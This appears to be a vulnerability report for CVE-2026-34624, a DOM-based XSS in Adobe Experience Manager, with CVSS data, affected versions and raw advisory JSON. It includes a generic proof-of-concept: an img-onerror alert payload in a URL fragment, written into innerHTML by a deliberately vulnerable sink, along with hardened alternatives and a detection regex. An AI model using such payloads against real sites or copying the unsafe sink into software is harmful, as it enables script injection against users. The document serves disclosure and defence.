Security Vulnerability Report
CVE-2026-34624 CVSS 5.4 MEDIUM

CVE-2026-34624

Published: 2026-04-14 19:16:38
Last Modified: 2026-04-15 19:42:06

Description

Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:* - VULNERABLE (versions up to and including 6.5.24.0)
cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:* - VULNERABLE (versions before 6.5.11.8)
Adobe Experience Manager <= 6.5.24
Adobe Experience Manager Screens < 6.5.11.8 (the vendor description gives the affected feature pack range as FP11.7 and earlier; the vendor bulletin for this CVE is the AEM Screens advisory APSB26-34)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Proof of Concept for DOM-based XSS in Adobe Experience Manager.
// This is a generic simulation of a fragment-to-innerHTML sink; the advisory
// does not identify the actual vulnerable component or sink.
// Attacker constructs a malicious URL containing a payload in the fragment or a parameter.
let payload = "<img src=x onerror=alert('CVE-2026-34624-XSS')>";
let targetUrl = "https://victim-site.com/content/path.html#" + encodeURIComponent(payload);

// Simulation of the vulnerable sink.
// If the application takes window.location.hash and writes it to innerHTML without sanitization:
function vulnerableSink(hash) {
  // location.hash keeps the leading '#' and the percent-encoding, so the sink
  // decodes it before the browser parses the result as markup.
  // Vulnerable code: direct insertion of untrusted data into the DOM.
  // An <img onerror> handler fires on insertion (a <script> tag inserted via innerHTML would not run).
  document.getElementById('userContent').innerHTML = decodeURIComponent(hash.slice(1));
}

// When the victim visits the URL, the following happens:
console.log("Attacker sends link: " + targetUrl);
// victim visits -> page runs vulnerableSink(window.location.hash)
// -> alert box pops up in the origin of victim-site.com
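The PoC above shows only the vulnerable sink. As an added example that is not part of the advisory or of AEM's own code, the block below puts the same fragment-to-innerHTML pattern next to two hardened versions (write as text, or allowlist the fragment as an anchor id) and a coarse triage check usable over proxy logs. The element object is a constructed stand-in for a DOM node so the code runs under Node; the payload, the id allowlist pattern and the function names are assumptions for illustration.

```javascript
// Added example, not the advisory's or AEM's code: the generic
// fragment-to-innerHTML DOM XSS pattern beside two hardened versions and a
// triage check. `makeElement` is a constructed stand-in for a DOM node so
// this runs under Node; in a browser `el` would be a real element.

function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// location.hash keeps its percent-encoding, so sinks usually decode it first.
// Malformed sequences (e.g. "%E0%A4%A") make decodeURIComponent throw; return
// null instead of crashing the page with an uncaught URIError.
function fragmentText(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  try {
    return decodeURIComponent(raw);
  } catch (e) {
    return null;
  }
}

// VULNERABLE: attacker-controlled text is parsed as markup. An <img onerror>
// handler runs as soon as it is inserted; a <script> tag inserted this way does not.
function renderHashUnsafe(el, hash) {
  const text = fragmentText(hash);
  if (text === null) return el.innerHTML;
  el.innerHTML = text;
  return el.innerHTML;
}

// HARDENED (1): same data, written as text. The payload is displayed literally
// and nothing is parsed as markup.
function renderHashSafe(el, hash) {
  const text = fragmentText(hash);
  if (text === null) return el.textContent;
  el.textContent = text;
  return el.textContent;
}

// HARDENED (2): when the fragment is only meant to select an anchor, allowlist
// its shape (assumed pattern: letter first, then up to 63 id characters) and
// use it as an id lookup, never as markup.
const ID_PATTERN = /^[A-Za-z][A-Za-z0-9_-]{0,63}$/;
function fragmentToId(hash) {
  const text = fragmentText(hash);
  return text !== null && ID_PATTERN.test(text) ? text : null;
}

// TRIAGE: a cheap signal for proxy logs or a WAF rule. Does the decoded
// fragment contain a tag start, an on*= handler attribute, or a javascript: URL?
// Coarse by design: it will flag "one=two" and miss some obfuscated payloads.
function looksLikeMarkup(hash) {
  const text = fragmentText(hash);
  if (text === null) return false;
  return /<\s*[a-z!\/]|\bon[a-z]+\s*=|javascript:/i.test(text);
}

// Constructed sample: the same payload and URL shape as the PoC.
const PAYLOAD = "<img src=x onerror=alert('xss')>";
const ATTACK_HASH = '#' + encodeURIComponent(PAYLOAD);

const unsafeEl = makeElement();
console.log('unsafe sink received markup:', renderHashUnsafe(unsafeEl, ATTACK_HASH));
const safeEl = makeElement();
console.log('safe sink received text:', renderHashSafe(safeEl, ATTACK_HASH));
console.log('allowlisted id:', fragmentToId('#section-2'), fragmentToId(ATTACK_HASH));
console.log('triage flag:', looksLikeMarkup(ATTACK_HASH), looksLikeMarkup('#section-2'));
```

In a real fix the allowlist approach is preferable wherever the fragment is only a navigation hint, because it removes the decode-and-render step entirely; textContent is the fallback when the text genuinely has to be displayed. Neither replaces a Content Security Policy, which would limit what an injected inline handler can do if another sink is missed.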

References

https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html (Vendor Advisory, APSB26-34)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34624", "sourceIdentifier": "[email protected]", "published": "2026-04-14T19:16:38.087", "lastModified": "2026-04-15T19:42:05.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager:*:*:*:*:-:*:*:*", "versionEndIncluding": "6.5.24.0", "matchCriteriaId": "5898EACB-FA50-4AED-9248-9D4FBFD558D9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:experience_manager_screens:*:*:*:*:-:*:*:*", "versionEndExcluding": "6.5.11.8", "matchCriteriaId": "CE7B652E-C71C-42E0-950D-59CABCE683CE"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}